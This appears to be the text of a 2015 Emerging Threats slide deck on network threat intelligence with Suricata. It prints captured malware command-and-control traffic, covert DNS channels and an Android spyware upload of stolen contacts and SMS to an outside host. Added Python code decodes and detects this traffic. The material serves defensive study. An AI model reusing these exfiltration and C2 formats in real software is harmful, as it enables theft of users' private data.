Emerging threats jonkman_sans_cti_summit_2015
CONFIDENTIAL
Threat Intel: Winning the War with Open Source Tools
Matt Jonkman
CTO, Emerging Threats
President, OISF
● 13+ year old open IDS community
● ET-Open IDS rules for Snort and Suricata
● ETPro Commercial rules
● IP and DNS reputation feeds
● Query Portal
Powering Network Defense Solutions Worldwide
• Installed in 10,000s of IDS/IPS sensors globally
• International staff of top threat researchers
• Trusted for timely, accurate, comprehensive threat intelligence
• HQ in Indianapolis, IN
• Originally founded as open source community in 2003
• Industry-leading cyber threat intelligence services
  • ETPro™ Ruleset
  • IQRisk™ Rep List
  • IQRisk™ Query
• 500+ customers in over 40 countries worldwide
Agenda
● The Problem: Malware, Kits, Zombies →
● How to APPLY data
● Suricata + Kibana + ETOpen + Rep Feeds
Command and Control
‣ IRC
‣ HTTP
‣ Non-Standard Protocols
‣ Custom Binary Channels
‣ Encrypted Channels
‣ SSL
‣ Emulate Known Good
‣ Social Networks
‣ Covert DNS Channels
‣ IM Networks
‣ SMS
Hello
xxxxxxxxxxxxxxxx.Windows XP.GT.Intel Pentium III Xeon
processor.x86 Family 6 Model 7 Stepping xxx
Mhz.xxxxxxx.RAM: 71 % used.RAM Total: xxxx MBs.Page
File: xxxx MBs.Page File Disponible: xxxx MBs.Virt Mem
Total: xxxxxxx MBs.Virt Mem Disponible: xxxxx MBs.Sin
Asignar.192.168.xxxx xxx xx.<xxxxx>--
inicio#&'b##'#UserXXXX#&'b##'#192.168.XX.5#&'b##'#XX
#&'b##'#XX-FXXXXXXXX5D#&'b##'#Microsoft Windows
XP/Service Pack 3
In Plain Sight...
GET /index.html&_=13297496 HTTP/1.1
User-Agent: C3F0F3F7F6F485F4F4F9F7F3FAF9FBFAF3F5F9ACAFAEA6B1F2F9F3
Connection: Keep-Alive
Cache-Control: no-cache
Host: www.<redacted>.tk
GET / HTTP/1.1
User-Agent: 1427242021235223232E20242D2E213A253A26242E2525262621242E7B78797166252E24
Host: xx5c1b1ea.ws
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.1.11
Date: Sat, 07 Jan 2012 00:51:49 GMT
Content-Type: text/html
Content-Length: 189
Connection: keep-alive
Vary: Accept-Encoding
Expires: Wed, 28 Dec 2011 00:51:49 GMT
Cache-Control: no-cache
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
<html>
<head>
<body style='margin:0px;padding:0px'>
<iframe border='none' style='width:100%;height:100%;border:medium none;' src='http://1.ws/wc/"xx5c1b01ea.ws"'></iframe>
</body>
</html>
<!-- k7a63YKrBr5NBnpY --><html><head><meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>C# Tutorial: GDI Drawing with Pen and Brush</title>
<LINK REL=StyleSheet HREF="default-1.css" tppabs="http://csharpcomputing.com/Tutorials/default.css" type="text/css">
</head><body>
<p> <a href="Lesson14.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson14.htm"><img border="0" src="PreviousArrow.gif"
tppabs="http://csharpcomputing.com/images/PreviousArrow.gif" width="26" height="26"></a>
<a href="index.htm" tppabs="http://csharpcomputing.com/Tutorials/index.htm"><img border="0" src="TOCIcon.gif"
tppabs="http://csharpcomputing.com/images/TOCIcon.gif" width="26" height="26"></a>
<a href="Lesson16.htm" tppabs="http://csharpcomputing.com/Tutorials/Lesson16.htm"><img border="0" src="NextArrow.gif"
tppabs="http://csharpcomputing.com/images/NextArrow.gif" width="26" height="26"></a></p>
<p><img border="0" src="blueline.gif" tppabs="http://csharpcomputing.com/images/blueline.gif" width="550" height="8"></p>
<h1>C# Tutorial, Lesson 15: Drawing with Pen and Brush.<br>
</h1>
<!-- {/*jgJ-.J} -->
<p>In this lesson I would like to introduce the Pen and the Brush objects. These objects are members of GDI+ library.
GDI+ or GDI.NET is a graphics library that lets you draw on a form. Prior to
.NET, C programmers were using GDI library to create breathtaking graphics.
GDI.NET is in fact just a wrapper for GDI. GDI+ is a great platform for
moderately complicated static graphs. However, it tends to be slow for moving
images and not sophisticated enough for 3 dimensional graphics. On Windows NT
platforms, GDI+ as well as GDI do not perform very well. The problem lies in the
way GDI/GDI+ runs. Windows NT architecture accepts user input in so called user
context and access graphics devices in system context. When GDI/GDI+ application
runs on Windows NT based machine, it has to constantly wait for these context
switches to occur. This makes GDI/GDI+ applications too slow for video game
programming and fancy 3 D graphics. Microsoft recently released a highly
optimized graphics platform - Managed DirectX which I will cover in a separate
tutorial.</p>
<script type="text/javascript"
src="show_ads.js" tppabs="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<p>The
Covert DNS Channels
23546.1.d869c6f2f70dd3dcf64b047f99f46be8.chr.santa-inbox.com
0-4-2-6-4-1-9-2-e-8-v-3-c-g-o-s-0-s-0-o-s-1-b-e-6-u-v-3-f-r-k.0-0-0-0-0-0-0-0-0-0-0-0-0-60-0-0-0-0-0-0-0-0-0-0-0-0-0.info
Request: TXT 2.32206.pf.deoderante.com
Response:
E9XnBP6CTP7zjAK43bg3RWWBwX5JpuFyTTpphcekpDR9nFPT7kzB3WEf9xe7fUAeFH4h1xWODFappd3kVXwLLdzAzjDSUs/ssIHbc8OFxhrw1D5Uh3UI1il+d5sa3oKB8qqo9oA8d5Jy4g7uwiScX+cBVkkrMMSsrAYTAiOjQswiVgU5AxQMybshGD0H0jRJVjBob6CLqMgcO0mpzxR1ccVbb8oG
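The hex-only User-Agent strings under "In Plain Sight" and the covert DNS query names and TXT answer above lend themselves to simple triage heuristics. The following is an added example, not code from the talk or from Emerging Threats; the sample records are constructed, reusing the hostnames and User-Agent values printed on the slides, with a locally generated base64 blob standing in for the TXT payload.

```python
"""Triage heuristics for the C2 exhibits on the slides: hex-only HTTP
User-Agent strings and covert DNS channels (machine-generated query names,
base64 blobs in TXT answers). Added example, not Emerging Threats or
Suricata code. Sample records are constructed; hostnames and UA strings
are copied from the slides, the TXT payload is generated locally."""
import base64
import re

HEX_UA = re.compile(r"^[0-9A-Fa-f]{16,}$")          # nothing but hex digits
HEX_LABEL = re.compile(r"^[0-9a-f]{24,}$")          # hash-looking DNS label
BASE64_TXT = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")


def hex_encoded_user_agent(ua):
    """Real UAs carry product tokens ('Debian APT-HTTP/1.3 (...)'); a value that is
    one long run of hex digits is the beacon style shown under 'In Plain Sight'."""
    return bool(HEX_UA.match(ua.strip()))


def dns_name_indicators(qname):
    """Return the reasons a query name looks like a covert channel (empty = none)."""
    labels = qname.rstrip(".").lower().split(".")
    reasons = []
    if len(qname) > 50:                              # ordinary hostnames are much shorter
        reasons.append("long-name")
    if any(HEX_LABEL.match(l) for l in labels):      # hash-like identifier label
        reasons.append("hex-label")
    if any(l.count("-") >= 10 for l in labels):      # data spelt out as dash-separated chars
        reasons.append("dash-encoded-label")
    if sum(1 for l in labels if l.isdigit()) >= 2:   # sequence/session counters as labels
        reasons.append("numeric-counter-labels")
    return reasons


def txt_answer_is_blob(rdata):
    """TXT answers used as a downlink look like base64, not readable text."""
    return bool(BASE64_TXT.match(rdata.strip().strip('"')))


def triage(http_records, dns_records):
    """Apply the heuristics to simplified HTTP/DNS records and collect findings."""
    findings = []
    for r in http_records:
        if hex_encoded_user_agent(r["ua"]):
            findings.append({"kind": "http", "host": r["host"], "reasons": ["hex-user-agent"]})
    for r in dns_records:
        reasons = dns_name_indicators(r["qname"])
        if r.get("qtype") == "TXT" and r.get("rdata") and txt_answer_is_blob(r["rdata"]):
            reasons.append("base64-txt-answer")
        if reasons:
            findings.append({"kind": "dns", "host": r["qname"], "reasons": reasons})
    return findings


# constructed sample input; FAKE_TXT stands in for the slide's TXT payload
FAKE_TXT = base64.b64encode(bytes(range(96))).decode()
SAMPLE_HTTP = [
    {"host": "nl.archive.ubuntu.com", "ua": "Debian APT-HTTP/1.3 (1.0.1ubuntu2)"},
    {"host": "www.<redacted>.tk", "ua": "C3F0F3F7F6F485F4F4F9F7F3FAF9FBFAF3F5F9ACAFAEA6B1F2F9F3"},
    {"host": "xx5c1b1ea.ws", "ua": "1427242021235223232E20242D2E213A253A26242E2525262621242E7B78797166252E24"},
]
SAMPLE_DNS = [
    {"qname": "nl.archive.ubuntu.com", "qtype": "A", "rdata": None},
    {"qname": "23546.1.d869c6f2f70dd3dcf64b047f99f46be8.chr.santa-inbox.com", "qtype": "A", "rdata": None},
    {"qname": "0-4-2-6-4-1-9-2-e-8-v-3-c-g-o-s-0-s-0-o-s-1-b-e-6-u-v-3-f-r-k."
              "0-0-0-0-0-0-0-0-0-0-0-0-0-60-0-0-0-0-0-0-0-0-0-0-0-0-0.info", "qtype": "A", "rdata": None},
    {"qname": "2.32206.pf.deoderante.com", "qtype": "TXT", "rdata": FAKE_TXT},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_HTTP, SAMPLE_DNS):
        print(f["kind"], f["host"], ",".join(f["reasons"]))
```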
Android!
POST /upload.php HTTP/1.1
accept: application/json
Content-Length: 2958
Content-Type: application/x-www-form-urlencoded
Host: gi60s.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Expect: 100-Continue
code=bb51d&data=
{"contacts":[
{"name":"Qm9i","numbers":"MDgxLTUwMTItMzQ1Njc4OTswODEtNTAxLTIzNDU2Nzg5Ow=="},
{"name":"RXZl","numbers":"MDY1LTAzMS0zMzc7MDY1LTAzMS0zMzc7"},
{"name":"VHJlbnQ=","numbers":"MDE5LTk5OTswMTktOTk5Ow=="}],
"sms":[
{"address":"MDgxNTEyMzQ1Njc4OQ==","type":"1","date":"1337803772831","body":"SGVsbG8gV29ybGQh"},
{"address":"MDEwMjM0NQ==","type":"1","date":"1337766125374","body":"WW91ciBzbXNUYW46IHQ0blMzY3IzVCAgQmVzdCBSZWdhcmRzIHlvdXIgQkFOSyE="},
{"address":"MDY1MDMxMzM3","type":"1","date":"1337766074005","body":"SGkhIEhvdyBhcmUgeW91Pw=="},
{"address":"MDgxNTAxMjM0NTY3ODk=","type":"1","date":"1337765998741","body":"VGh4IGZvciB0aGUgcGFzc3dvcmQgOikgTWluZSBpczogbjB0UzNjcjNUIGdyZWV0eg=="},
{"address":"MDgxLTUwMTItMzQ1Njc4OQ==","type":"2","date":"1337765942437","body":"TXkgc2VjcmV0IHBhc3N3b3JkIGlzOiB0MHBzM2NyM3Q="},
{"address":"MDgxLTUwMTItMzQ1Njc4OQ==","type":"2","date":"1337765923366","body":"SGkgQm9iLCBob3cgYXJlIHlvdT8="}],
"recent":[
{"number":"0815123456789","type":"3","date":"1337803772327","duration":"0"},
{"number":"065031337","type":"1","date":"1337766141605","duration":"4"},
{"number":"065031337","type":"2","date":"1337766020756","duration":"4"},
{"number":"08150123456789","type":"2","date":"1337765897517","duration":"4"}],
"url":[
{"url":"aHR0cDovL3d3dy5iYmMuY28udWsv"},
{"url":"aHR0cDovL3d3dy53ZWF0aGVyLmNvbS8="},
{"url":"aHR0cDovL3d3dy5hbWF6b24uY29tLw=="},
{"url":"aHR0cDovL2VzcG4uY29tLw=="},
{"url":"aHR0cDovL3d3dy5ueXRpbWVzLmNvbS8="},
{"url":"aHR0cDovL3d3dy5jbm4uY29tL2luZGV4Lmh0bWw="},
{"url":"aHR0cDovL3d3dy5lYmF5LmNvbS8="},
{"url":"aHR0cDovL3d3dy53aWtpcGVkaWEub3JnLw=="},
{"url":"aHR0cDovL3d3dy5mYWNlYm9vay5jb20v"},
{"url":"aHR0cDovL3d3dy5teXNwYWNlLmNvbS8="},
{"url":"aHR0cDovL3d3dy5tc24uY29tLw=="},
{"url":"aHR0cDovL3d3dy55YWhvby5jb20v"},
{"url":"aHR0cDovL3BpY2FzYXdlYi5nb29nbGUuY29tL20vdmlld2VyP3NvdXJjZT1hbmRyb2lkY2xpZW50"}
code=bb51d&data=
{"contacts":[
{"name":"Bob","numbers":"081-5012-3456789;081-501-23456789;"},
{"name":"Eve","numbers":"065-031-337;065-031-337;"},
{"name":"Trent","numbers":"019-999;019-999;"}],
"sms":[
{"address":"0815123456789","type":"1","date":"1337803772831","body":"Hello World!"},
{"address":"0102345","type":"1","date":"1337766125374","body":"Your smsTan: t4nS3cr3T Best Regards your BANK!"},
{"address":"065031337","type":"1","date":"1337766074005","body":"Hi! How are you?"},
{"address":"08150123456789","type":"1","date":"1337765998741","body":"Thx for the password :) Mine is: n0tS3cr3T greetz"},
{"address":"081-5012-3456789","type":"2","date":"1337765942437","body":"My secret password is: t0ps3cr3t"},
{"address":"081-5012-3456789","type":"2","date":"1337765923366","body":"Hi Bob, how are you?"}],
"recent":[
{"number":"0815123456789","type":"3","date":"1337803772327","duration":"0"},
{"number":"065031337","type":"1","date":"1337766141605","duration":"4"},
{"number":"065031337","type":"2","date":"1337766020756","duration":"4"},
{"number":"08150123456789","type":"2","date":"1337765897517","duration":"4"}],
"url":[
{ "url":"http://www.bbc.co.uk/"},
{ "url":"http://www.weather.com/"},
{ "url":"http://www.amazon.com/"},
{ "url":"http://espn.com/"},
{ "url":"http://www.nytimes.com/"},
{ "url":"http://www.cnn.com/"},
{ "url":"http://www.ebay.com/"},
{ "url":"http://www.wikipedia.org/"},
{ "url":"http://www.facebook.com/"},
{ "url":"http://www.myspace.com/"},
{ "url":"http://www.msn.com/"},
{ "url":"http://www.yahoo.com/"},
{ "url":"http://picasaweb.google.com/m/viewer?source=androidclient"}
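The decoding stages shown above (URL-encoded form body, JSON whose values are base64, plaintext) can be reproduced with the decoder below. It is an added example rather than code from the talk; the sample body is the opening part of the captured POST body, cut after the first SMS entry and closed so that it parses (constructed).

```python
"""Unpack the Android spyware upload shown on the slides: an HTTP form body
whose 'data' field is URL-encoded JSON with base64-encoded values.
Added example, not code from the slides or from Emerging Threats; the
sample body is a copy of the slide's capture cut after the first SMS and
closed so it parses (constructed)."""
import base64
import binascii
import json
from urllib.parse import parse_qs

SAMPLE_BODY = (
    "code=bb51d&data=%7B%22contacts%22%3A%5B%7B+%22name%22%3A%22Qm9i%0A%22%2C%22numbers%22%3A"
    "%22MDgxLTUwMTItMzQ1Njc4OTswODEtNTAxLTIzNDU2Nzg5Ow%3D%3D%0A%22%7D%2C%7B+%22name%22%3A%22RXZl%0A"
    "%22%2C%22numbers%22%3A%22MDY1LTAzMS0zMzc7MDY1LTAzMS0zMzc7%0A%22%7D%2C%7B+%22name%22%3A%22VHJlbnQ"
    "%3D%0A%22%2C%22numbers%22%3A%22MDE5LTk5OTswMTktOTk5Ow%3D%3D%0A%22%7D%5D%2C%22sms%22%3A%5B%7B+"
    "%22address%22%3A%22MDgxNTEyMzQ1Njc4OQ%3D%3D%0A%22%2C%22type%22%3A%221%22%2C%22date%22%3A"
    "%221337803772831%22%2C%22body%22%3A%22SGVsbG8gV29ybGQh%0A%22%7D%5D%7D"
)

# fields the bot base64-encodes; type/date/duration are sent as plain digits
B64_FIELDS = {"name", "numbers", "address", "body", "url"}


def b64_text(value):
    """Decode one base64 field; values that do not decode are kept as captured."""
    try:
        return base64.b64decode(value.strip(), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return value


def decode_fields(node):
    """Walk the parsed JSON and decode the base64 fields, leaving the rest alone."""
    if isinstance(node, dict):
        return {k: b64_text(v) if k in B64_FIELDS and isinstance(v, str) else decode_fields(v)
                for k, v in node.items()}
    if isinstance(node, list):
        return [decode_fields(item) for item in node]
    return node


def decode_exfil_body(body):
    """Form body -> {'code': bot id, 'data': decoded JSON}."""
    params = parse_qs(body, keep_blank_values=True)   # handles %XX and '+' -> space
    # the bot writes a raw newline after every base64 value; strict JSON forbids
    # control characters inside strings, so parse with strict=False
    raw = json.loads(params["data"][0], strict=False)
    return {"code": params["code"][0], "data": decode_fields(raw)}


if __name__ == "__main__":
    print(json.dumps(decode_exfil_body(SAMPLE_BODY), indent=1))
```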
Suricata – Cost-effective IDS
• Open-source IDPS
• Developed by the OISF
• First beta introduced in December 2009
• Supported OS
  • FreeBSD
  • Linux
  • UNIX
  • Mac OS
  • Microsoft Windows
• Licensing and Availability
  • GNU General Public License
  • www.suricata-ids.org
{"timestamp":"2014-11-18T12:40:42.744230","flow_id":2901423184,"event_type":"fileinfo","src_ip":"213.136.29.218","src_port":80,"dest_ip":"192.168.1.4","dest_port":53652,"proto":"TCP",
"http":{"url":"/ubuntu/pool/main/u/util-linux/bsdutils_2.20.1-5.1ubuntu20.3_i386.deb","hostname":"nl.archive.ubuntu.com","http_user_agent":"Debian APT-HTTP/1.3 (1.0.1ubuntu2)"},
"fileinfo":{"filename":"/ubuntu/pool/main/u/util-linux/bsdutils_2.20.1-5.1ubuntu20.3_i386.deb","magic":"Debian binary package (format 2.0)","state":"CLOSED","md5":"6a1a4e3b53d4ff02cd3ded3cf0ce3a42","stored":false,"size":5475,"tx_id":2}}
{"timestamp":"2014-11-21T08:11:45.222089","flow_id":2896612328,"event_type":"tls","src_ip":"23.206.115.50","src_port":443,"dest_ip":"10.8.0.6","dest_port":47063,"proto":"TCP",
"tls":{"subject":"serialNumber=5189573, unknown=US, unknown=Delaware, unknown=Private Organization, C=US, unknown=94107, ST=California, L=San Francisco, unknown=855 FOLSOM ST APT 535, O=Remember The Milk Inc., OU=Comodo EV SAN SSL,CN=www.rememberthemilk.com","issuerdn":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO Extended Validation Secure Server CA 2",
"fingerprint":"0b:1e:68:8c:ec:9f:7a:9c:70:4f:58:41:fb:c6:53:ba:ba:e1:6c:af","version":"TLS 1.2"}}
{"timestamp":"2014-11-21T08:32:22.001162","flow_id":2904615464,"event_type":"netflow","src_ip":"23.206.107.75","src_port":443,"dest_ip":"10.8.0.6","dest_port":52556,"proto":"TCP",
"netflow":{"app_proto":"tls","pkts":73,"bytes":66135,"start":"2014-11-21T08:28:08.789426","end":"2014-11-21T08:30:19.242083","age":131},"tcp":{"tcp_flags":"1b","syn":true,"fin":true,"psh":true,"ack":true}}
# IP Reputation
#reputation-categories-file: /etc/suricata/iprep/categories.txt
#default-reputation-path: /etc/suricata/iprep
#reputation-files:
# - reputation.list
1,CnC,Malware Command and Control Server
2,Bot,Known Infected Bot
3,Spam,Known Spam Source
4,Drop,Drop site for logs or stolen credentials
5,SpywareCnC,Spyware Reporting Server
6,OnlineGaming,Questionable Gaming Site
7,DriveBySrc,Driveby Source
9,ChatServer,POLICY Chat Server
10,TorNode,POLICY Tor Node
13,Compromised,Known compromised or Hostile
15,P2P,P2P Node
16,Proxy,Proxy Host
17,IPCheck,IP Check Services
19,Utility,Known Good Public Utility
20,DDoSTarget,Target of a DDoS
21,Scanner,Host Performing Scanning
23,Brute_Forcer,SSH or other brute forcer
24,FakeAV,Fake AV and AS Products
25,DynDNS,Domain or IP Related to a Dynamic DNS Entry or Request
26,Undesirable,Undesirable but not illegal
27,AbusedTLD,Abused or free TLD Related
28,SelfSignedSSL,Self Signed SSL or other suspicious encryption
29,Blackhole,Blackhole or Sinkhole systems
30,RemoteAccessService,GoToMyPC and similar remote access services
31,P2PCnC,Distributed CnC Nodes
33,Parking,Domain or SEO Parked
34,VPN,VPN Server
35,EXE_Source,Observed serving executables
37,Mobile_CnC,Known CnC for Mobile specific Family
38,Mobile_Spyware_CnC,Spyware CnC specific to mobile devices
39,Skype_SuperNode,Observed Skype Bootstrap or Supernode
40,Bitcoin_Related,Bitcoin Mining and related
41,DDoSAttacker,DDoS Source
104.28.1.81,34,117
109.98.29.2,21,42
110.4.91.87,35,107
114.49.15.0,2,67
114.79.12.5,2,87
114.99.50.2,21,107
115.68.2.49,24,63
119.6.108.7,23,42
119.81.70.6,23,122
12.23.239.4,21,82
120.83.6.14,23,32
121.7.94.49,15,82
123.0.48.59,15,57
125.69.87.5,21,72
135.23.77.3,21,50
14.3.38.120,23,70
142.0.38.68,2,37
alert ip $HOME_NET any -> any any (msg:"IPREP internal host talking to CnC server"; flow:to_server; iprep:dst,CnC,>,30; sid:1; rev:1;)
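As an added example (not Suricata's own code), the following reimplements the lookup behind the iprep keyword in that rule, reading categories.txt lines from the slide and a constructed reputation.list, and applies it to constructed EVE JSON records of the kind shown earlier (TEST-NET addresses). Only the iprep option is evaluated; $HOME_NET and flow:to_server are left to Suricata.

```python
"""Evaluate Suricata's iprep keyword against EVE JSON flow records.
Added example, not Suricata code: it reimplements the lookup the rule
'iprep:dst,CnC,>,30' performs so the scoring can be followed step by step.
categories.txt lines are taken from the slide; reputation.list entries and
the EVE records are constructed (TEST-NET addresses)."""
import json
import operator
import re

CATEGORIES_TXT = """\
1,CnC,Malware Command and Control Server
2,Bot,Known Infected Bot
4,Drop,Drop site for logs or stolen credentials
21,Scanner,Host Performing Scanning
"""

# constructed: <ip>,<category id>,<score 0-127>; one host may carry several categories
REPUTATION_LIST = """\
203.0.113.7,1,85
203.0.113.7,4,60
203.0.113.9,1,20
198.51.100.23,21,107
"""

RULE = ('alert ip $HOME_NET any -> any any (msg:"IPREP internal host talking to CnC server"; '
        'flow:to_server; iprep:dst,CnC,>,30; sid:1; rev:1;)')

# constructed EVE records in the shape of the netflow/fileinfo events on the slides
EVE_LINES = """\
{"timestamp":"2014-11-21T08:40:01.000001","event_type":"netflow","src_ip":"192.168.1.4","src_port":50112,"dest_ip":"203.0.113.7","dest_port":443,"proto":"TCP"}
{"timestamp":"2014-11-21T08:40:02.000002","event_type":"netflow","src_ip":"192.168.1.4","src_port":50113,"dest_ip":"203.0.113.9","dest_port":80,"proto":"TCP"}
{"timestamp":"2014-11-21T08:40:03.000003","event_type":"netflow","src_ip":"192.168.1.4","src_port":50114,"dest_ip":"198.51.100.23","dest_port":22,"proto":"TCP"}
{"timestamp":"2014-11-18T12:40:42.744230","event_type":"fileinfo","src_ip":"213.136.29.218","src_port":80,"dest_ip":"192.168.1.4","dest_port":53652,"proto":"TCP"}
"""

OPS = {">": operator.gt, "<": operator.lt, "=": operator.eq}


def parse_categories(text):
    """categories.txt: id,short name,description -> {name: id}."""
    cats = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            cid, name, _desc = line.split(",", 2)
            cats[name] = int(cid)
    return cats


def parse_reputation(text):
    """reputation.list: ip,category id,score -> {ip: {category id: score}}."""
    rep = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            ip, cid, score = line.split(",")
            rep.setdefault(ip, {})[int(cid)] = int(score)
    return rep


def iprep_option(rule):
    """Pull 'dst,CnC,>,30' out of the rule and split it into side, category, operator, score."""
    side, cat, op, score = re.search(r"iprep:([^;]+);", rule).group(1).split(",")
    return side.strip(), cat.strip(), op.strip(), int(score)


def iprep_match(rule, cats, rep, src_ip, dest_ip):
    """True when the chosen side's score in the named category satisfies the operator.
    A host with no entry for that category is modelled as no match, whatever the operator."""
    side, cat, op, threshold = iprep_option(rule)
    cid = cats[cat]
    hosts = {"src": [src_ip], "dst": [dest_ip], "any": [src_ip, dest_ip], "both": [src_ip, dest_ip]}[side]
    hits = [s is not None and OPS[op](s, threshold) for s in (rep.get(ip, {}).get(cid) for ip in hosts)]
    return all(hits) if side == "both" else any(hits)


def alerting_destinations(eve_text, rule=RULE):
    """Run the iprep test over EVE records; returns the dest_ips that would alert."""
    cats, rep = parse_categories(CATEGORIES_TXT), parse_reputation(REPUTATION_LIST)
    out = []
    for line in eve_text.splitlines():
        ev = json.loads(line)
        if iprep_match(rule, cats, rep, ev["src_ip"], ev["dest_ip"]):
            out.append(ev["dest_ip"])
    return out


if __name__ == "__main__":
    print(alerting_destinations(EVE_LINES))  # ['203.0.113.7']
```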
https://home.regit.org
Intel(R) Xeon(R) CPU E5-2680 0 @ 2.70GHz (16 cores counting Hyperthreading)
32 GB RAM
Intel 82599EB 10-Gigabit SFI/SFP+ (approx $700)
~ $4,972
Contact Information
• Matt Jonkman, [email protected]
• Emerging Threats [email protected]
http://www.emergingthreats.net
http://www.suricata-ids.org
http://openinfosecfoundation.org